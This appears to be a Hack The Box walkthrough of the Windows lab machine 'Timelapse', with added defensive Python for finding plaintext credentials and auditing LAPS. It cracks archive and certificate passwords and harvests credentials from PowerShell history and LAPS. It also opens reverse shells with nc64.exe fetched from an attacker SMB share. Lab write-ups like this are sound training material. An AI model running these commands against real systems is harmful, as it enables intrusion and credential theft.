Timelapse - Hack The Box
Timelapse is an easy-rated Windows machine from Hack The Box. The box is quite realistic: you work your way to the initial foothold starting with some locked files on an open share. I struggled a bit on what to do with the found certificates, but once figured out it was smooth sailing to Administrator. This wasn’t the most enjoyable box I’ve done, but neither was it particularly bad.
USER
Step 1
nmap:
➜ timelapse nmap -Pn -n -p- 10.10.11.152 --open -v
[... snip ...]
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5986/tcp open wsmans
9389/tcp open adws
49667/tcp open unknown
49673/tcp open unknown
49674/tcp open unknown
49696/tcp open unknown
51418/tcp open unknown
➜ timelapse nmap -Pn -n -p53,88,135,139,389,445,464,593,636,3268,3269,5986,9389,49667,49673,49674,49696,51418 -sCV 10.10.11.152
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-03-31 15:20:24Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5986/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
| ssl-cert: Subject: commonName=dc01.timelapse.htb
| Not valid before: 2021-10-25T14:05:29
|_Not valid after: 2022-10-25T14:25:29
|_ssl-date: 2022-03-31T15:21:54+00:00; +8h02m39s from scanner time.
| tls-alpn:
|_ http/1.1
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49673/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49674/tcp open msrpc Microsoft Windows RPC
49696/tcp open msrpc Microsoft Windows RPC
51418/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
➜ timelapse sudo nmap -sU -p- --open 10.10.11.152 -v
[... snip ...]
PORT STATE SERVICE
53/udp open domain
dirb:
N/A
nikto:
N/A
ffuf:
N/A
smbclient:
➜ timelapse smbclient -L 10.10.11.152
Enter WORKGROUP\void's password:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Shares Disk
SYSVOL Disk Logon server share
rpcclient:
➜ timelapse rpcclient -U "" dc01.timelapse.htb
Enter WORKGROUP\'s password:
rpcclient $>
dc01.timelapse.htb (from nmap)
Step 2
The first thing we find is a globally open SMB share, so we enumerate it.
➜ timelapse smbclient \\\\10.10.11.152\\Shares
Enter WORKGROUP\voids password:
Try "help" to get a list of possible commands.
smb: \> recurse on
smb: \> ls
. D 0 Mon Oct 25 17:39:15 2021
.. D 0 Mon Oct 25 17:39:15 2021
Dev D 0 Mon Oct 25 21:40:06 2021
HelpDesk D 0 Mon Oct 25 17:48:42 2021
\Dev
. D 0 Mon Oct 25 21:40:06 2021
.. D 0 Mon Oct 25 21:40:06 2021
winrm_backup.zip A 2611 Mon Oct 25 17:46:42 2021
\HelpDesk
. D 0 Mon Oct 25 17:48:42 2021
.. D 0 Mon Oct 25 17:48:42 2021
LAPS.x64.msi A 1118208 Mon Oct 25 16:57:50 2021
LAPS_Datasheet.docx A 104422 Mon Oct 25 16:57:46 2021
LAPS_OperationsGuide.docx A 641378 Mon Oct 25 16:57:40 2021
LAPS_TechnicalSpecification.docx A 72683 Mon Oct 25 16:57:44 2021
smb: \> prompt off
smb: \> mget *
getting file \Dev\winrm_backup.zip of size 2611 as Dev/winrm_backup.zip (23.0 KiloBytes/sec) (average 23.0 KiloBytes/sec)
getting file \HelpDesk\LAPS.x64.msi of size 1118208 as HelpDesk/LAPS.x64.msi (3627.9 KiloBytes/sec) (average 2656.7 KiloBytes/sec)
getting file \HelpDesk\LAPS_Datasheet.docx of size 104422 as HelpDesk/LAPS_Datasheet.docx (886.7 KiloBytes/sec) (average 2270.4 KiloBytes/sec)
getting file \HelpDesk\LAPS_OperationsGuide.docx of size 641378 as HelpDesk/LAPS_OperationsGuide.docx (963.6 KiloBytes/sec) (average 1548.7 KiloBytes/sec)
getting file \HelpDesk\LAPS_TechnicalSpecification.docx of size 72683 as HelpDesk/LAPS_TechnicalSpecification.docx (507.0 KiloBytes/sec) (average 1438.0 KiloBytes/sec)
Before going through the LAPS files, we can try to brute force the zip password. Remember to clean up the hash file (strip the filename prefix and trailing fields zip2john adds) so that the line starts with $pkzip2$ and ends with $/pkzip2$.
➜ Dev unzip winrm_backup.zip
Archive: winrm_backup.zip
[winrm_backup.zip] legacyy_dev_auth.pfx password:
skipping: legacyy_dev_auth.pfx incorrect password
➜ Dev /usr/sbin/zip2john winrm_backup.zip > zip.hash
➜ Dev vim zip.hash
➜ Dev hashcat -a0 -m17210 zip.hash /usr/share/wordlists/rockyou.txt
[... snip ...]
$pkzip2$1*2*2*0*965* [... snip ...] *$/pkzip2$:supremelegacy
Session..........: hashcat
Status...........: Cracked
➜ Dev unzip -P supremelegacy winrm_backup.zip
Archive: winrm_backup.zip
inflating: legacyy_dev_auth.pfx
Step 3
Try to crack the certificate (.pfx) password.
➜ Dev /usr/share/john/pfx2john.py legacyy_dev_auth.pfx | john --wordlist=/usr/share/wordlists/rockyou.txt /dev/stdin
[... snip ...]
thuglegacy (legacyy_dev_auth.pfx)
1g 0:00:01:06 DONE (2022-03-31 12:18) 0.01499g/s 48458p/s 48458c/s 48458C/s thuglife06..thug211
Testing the new password against LDAP, SMB and WinRM, we find our first set of working creds over LDAP: legacy:thuglegacy.
➜ timelapse crackmapexec ldap 10.10.11.152 -u legacy -p thuglegacy
LDAP 10.10.11.152 389 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:timelapse.htb) (signing:True) (SMBv1:False)
LDAP 10.10.11.152 389 DC01 [+] timelapse.htb\legacy:thuglegacy
➜ timelapse crackmapexec smb 10.10.11.152 -u legacy -p thuglegacy
SMB 10.10.11.152 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:timelapse.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.152 445 DC01 [-] timelapse.htb\legacy:thuglegacy STATUS_ACCESS_DENIED
➜ timelapse crackmapexec winrm 10.10.11.152 -u legacy -p thuglegacy
WINRM 10.10.11.152 5986 DC01 [*] Windows 10.0 Build 17763 (name:DC01) (domain:timelapse.htb)
WINRM 10.10.11.152 5986 DC01 [*] https://10.10.11.152:5986/wsman
WINRM 10.10.11.152 5986 DC01 [-] timelapse.htb\legacy:thuglegacy "HTTPConnectionPool(host='10.10.11.152', port=5985): Max retries exceeded with url: /wsman (Caused by ConnectTimeoutError(<urllib3.connection.HTTPConnection object at 0x7f4a3de153a0>, 'Connection to 10.10.11.152 timed out. (connect timeout=30)'))"
However, testing the LDAP credentials against everything and anything only results in errors, so let’s go back to the .pfx file. Reading about the .pfx format, we should be able to extract a .key and a .crt file from it, which we can then use for certificate-based evil-winrm login.
➜ Dev openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out priv.key
Enter Import Password: thuglegacy
Enter PEM pass phrase: thuglegacy
Verifying - Enter PEM pass phrase: thuglegacy
➜ Dev openssl pkcs12 -in legacyy_dev_auth.pfx -clcerts -nokeys -out pfx.crt
Enter Import Password: thuglegacy
➜ Dev evil-winrm -i 10.10.11.152 -c pfx.crt -k priv.key -p -u -S
Enter PEM pass phrase: thuglegacy
*Evil-WinRM* PS C:\Users\legacyy\Documents> whoami
timelapse\legacyy
*Evil-WinRM* PS C:\Users\legacyy\Desktop> type user.txt
98f42c5d696089eac85401c445d1e2f9
ROOT
Step 1
With manual enumeration we see that our privileges are low and we are in no interesting groups.
*Evil-WinRM* PS C:\Users\legacyy\Desktop> whoami /all
USER INFORMATION
----------------
User Name SID
================= ============================================
timelapse\legacyy S-1-5-21-671920749-559770252-3318990721-1603
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
=========================================== ================ ============================================ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
TIMELAPSE\Development Group S-1-5-21-671920749-559770252-3318990721-3101 Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity Well-known group S-1-18-1 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label S-1-16-8448
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
We find three new users: Administrator, svc_deploy and TRX.
*Evil-WinRM* PS C:\Users> ls
Directory: C:\Users
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 10/23/2021 11:27 AM Administrator
d----- 10/25/2021 8:22 AM legacyy
d-r--- 10/23/2021 11:27 AM Public
d----- 10/25/2021 12:23 PM svc_deploy
d----- 2/23/2022 5:45 PM TRX
Step 2
From the SMB share we found some LAPS documentation, so the privesc probably has something to do with this. Microsoft’s LAPS is a client-side extension that runs a single DLL which manages the local administrator password (AdmPwd.dll). The DLL is present in C:\Program Files\LAPS\CSE\AdmPwd.dll; download it.
*Evil-WinRM* PS C:\Program Files\LAPS\CSE> download "C:\Program Files\LAPS\CSE\AdmPwd.dll"
However, we are a low-privileged user, so we can’t poison the DLL. For a quick win we check the PowerShell history and find a new set of creds, svc_deploy:E3R$Q62^12p7PLlC%KWaxuaV, together with the exact commands used to get code execution as user svc_deploy.
*Evil-WinRM* PS C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine> type ConsoleHost_history.txt
whoami
ipconfig /all
netstat -ano |select-string LIST
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {whoami}
get-aduser -filter * -properties *
exit
Replicate the commands from the history to get a new reverse shell.
*Evil-WinRM* PS C:\Users\legacyy\Documents> $so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
*Evil-WinRM* PS C:\Users\legacyy\Documents> $p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force
*Evil-WinRM* PS C:\Users\legacyy\Documents> $c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
*Evil-WinRM* PS C:\Users\legacyy\Documents> invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {whoami}
timelapse\svc_deploy
➜ /opt impacket-smbserver share . -smb2support
*Evil-WinRM* PS C:\Users\legacyy\Documents> invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {//10.10.14.2/share/nc64.exe 10.10.14.2 4488 -e powershell}
➜ timelapse rlwrap nc -lvnp 4488
listening on [any] 4488 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.11.152] 52197
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\Users\svc_deploy\Documents> whoami
timelapse\svc_deploy
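From the defender's side, the finding above (a plaintext password left in PSReadLine's ConsoleHost_history.txt) is easy to hunt for across user profiles. The following is an added example, not code from the original writeup: a small Python scanner run here over a constructed history file with placeholder credentials, which flags the ConvertTo-SecureString -AsPlainText and net use /user: command shapes, attributes the account name from the nearby PSCredential line, and masks the secret in its report.

```python
from __future__ import annotations
import re
from dataclasses import dataclass
from typing import Optional

# Constructed sample shaped like ConsoleHost_history.txt
# (%APPDATA%\Microsoft\Windows\PowerShell\PSReadLine\); credentials are placeholders.
SAMPLE_HISTORY = """whoami
ipconfig /all
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString 'Placeholder!Pass123' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
net use \\\\fileserver\\share /user:CORP\\backup P@ssw0rdPlaceholder
Get-ADUser -Filter *
exit
"""

# Command shapes that write a plaintext secret into the history file.
PATTERNS = {
    "ConvertTo-SecureString -AsPlainText": re.compile(
        r"ConvertTo-SecureString\s+(['\"])(?P<secret>.+?)\1.*-AsPlainText", re.I),
    "net use /user:": re.compile(
        r"\bnet\s+use\b.*?/user:(?P<user>\S+)\s+(?P<secret>\S+)", re.I),
}
# The account for a SecureString usually shows up on a nearby PSCredential('name', ...) line.
PSCRED = re.compile(r"PSCredential\s*\(\s*['\"](?P<user>[^'\"]+)['\"]", re.I)

@dataclass
class Finding:
    line_no: int
    kind: str
    user: Optional[str]
    masked_secret: str  # the report never contains the secret itself

def mask(secret: str) -> str:
    return secret[:2] + "*" * max(len(secret) - 2, 0)

def scan_history(text: str) -> list[Finding]:
    lines = text.splitlines()
    findings: list[Finding] = []
    for i, line in enumerate(lines, start=1):
        for kind, pat in PATTERNS.items():
            m = pat.search(line)
            if not m:
                continue
            user = m.groupdict().get("user")
            if user is None:  # look up to three lines ahead for the PSCredential line
                for later in lines[i:i + 3]:
                    if (mc := PSCRED.search(later)):
                        user = mc.group("user")
                        break
            findings.append(Finding(i, kind, user, mask(m.group("secret"))))
    return findings
```

Run it over every ConsoleHost_history.txt under C:\Users\*\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ and treat each hit as a credential to rotate, not just a file to delete.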
Step 3
Enumerating the directories, we find laps.ps1 on the desktop of svc_deploy.
PS C:\Users\svc_deploy\Desktop> type laps.ps1
$Computers = Get-ADComputer -Filter * -Properties ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
$Computers | Sort-Object ms-Mcs-AdmPwdExpirationTime | Format-Table -AutoSize Name, DnsHostName, ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
$computers | Export-Csv -path c:\users\danny\desktop\"LAPS-$((Get-Date).ToString("MM-dd-yyyy")).csv" -NoTypeInformation
Run the script:
PS C:\Users\svc_deploy\Desktop> ./laps.ps1
Name DnsHostName ms-Mcs-AdmPwd ms-Mcs-AdmPwdExpirationTime
---- ----------- ------------- ---------------------------
WEB01
DEV01
DB01
DC01 dc01.timelapse.htb 6+e(2G,L;TK5+eGy%gJ8s.2X 132936070633235489
A new set of creds: Administrator:6+e(2G,L;TK5+eGy%gJ8s.2X
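The columns worth reading in that output, from an admin's point of view, are ms-Mcs-AdmPwdExpirationTime (stored as a Windows FILETIME) and the three blank rows: WEB01, DEV01 and DB01 carry no LAPS password at all. As an added example that is not part of the writeup, the Python below decodes that FILETIME and audits a constructed row set mirroring the output (the DC01 password replaced by a placeholder, the expiration value as shown above), flagging unmanaged hosts, expired passwords, and expiry dates pushed beyond an assumed 30-day policy.

```python
from datetime import datetime, timedelta, timezone
from typing import List, Optional, Tuple

# ms-Mcs-AdmPwdExpirationTime is a Windows FILETIME: 100-ns ticks since 1601-01-01 UTC.
FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)

def filetime_to_datetime(ticks: int) -> datetime:
    return FILETIME_EPOCH + timedelta(microseconds=ticks // 10)

def datetime_to_filetime(dt: datetime) -> int:
    td = dt - FILETIME_EPOCH
    return ((td.days * 86400 + td.seconds) * 1_000_000 + td.microseconds) * 10

# Constructed rows mirroring the laps.ps1 output:
# (Name, ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime). Password is a placeholder.
SAMPLE_ROWS: List[Tuple[str, Optional[str], Optional[int]]] = [
    ("WEB01", None, None),
    ("DEV01", None, None),
    ("DB01", None, None),
    ("DC01", "<placeholder-laps-password>", 132936070633235489),
]

def audit_laps(rows, now: datetime, max_age_days: int = 30) -> List[Tuple[str, str]]:
    """Classify each computer's LAPS state relative to `now` and the password-age policy."""
    results = []
    for name, pwd, exp in rows:
        if not pwd or exp is None:
            # LAPS has never written a password: CSE not installed, GPO not applied,
            # or the reading account lacks the right to see the attribute.
            results.append((name, "NO_LAPS_PASSWORD"))
            continue
        expires = filetime_to_datetime(exp)
        if expires < now:
            results.append((name, "EXPIRED"))  # the CSE should have rotated it by now
        elif expires > now + timedelta(days=max_age_days):
            # Expiry beyond policy: someone with write access pushed the date out; investigate.
            results.append((name, "EXPIRY_BEYOND_POLICY"))
        else:
            results.append((name, "OK"))
    return results
```

The DC01 value decodes to 2022-04-05 04:37:43 UTC, five days after the scan date, so with `now` set to the scan time DC01 is reported OK while the other three hosts are reported as unmanaged.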
PS C:\Users\svc_deploy\Desktop> $so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
PS C:\Users\svc_deploy\Desktop> $p = ConvertTo-SecureString '6+e(2G,L;TK5+eGy%gJ8s.2X' -AsPlainText -Force
PS C:\Users\svc_deploy\Desktop> $c = New-Object System.Management.Automation.PSCredential ('Administrator', $p)
PS C:\Users\svc_deploy\Desktop> invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {whoami}
timelapse\administrator
PS C:\Users\svc_deploy\Desktop> invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {//10.10.14.2/share/nc64.exe 10.10.14.2 4499 -e powershell}
➜ timelapse rlwrap nc -lvnp 4499
listening on [any] 4499 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.11.152] 64806
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\Users\Administrator\Documents> whoami
timelapse\administrator
Step 4
The flag, root.txt, is not in its normal directory (C:\Users\Administrator\Desktop\root.txt). Looking around, we find the flag in the TRX user’s directory.
PS C:\Users\TRX\Desktop> type root.txt
5f0405eed578c041a6f9ad86d0318e82
References
.pfx to .key & .crt: https://medium.com/beingcoders/easy-way-to-convert-pfx-to-crt-key-files-in-10-minutes-683849242c65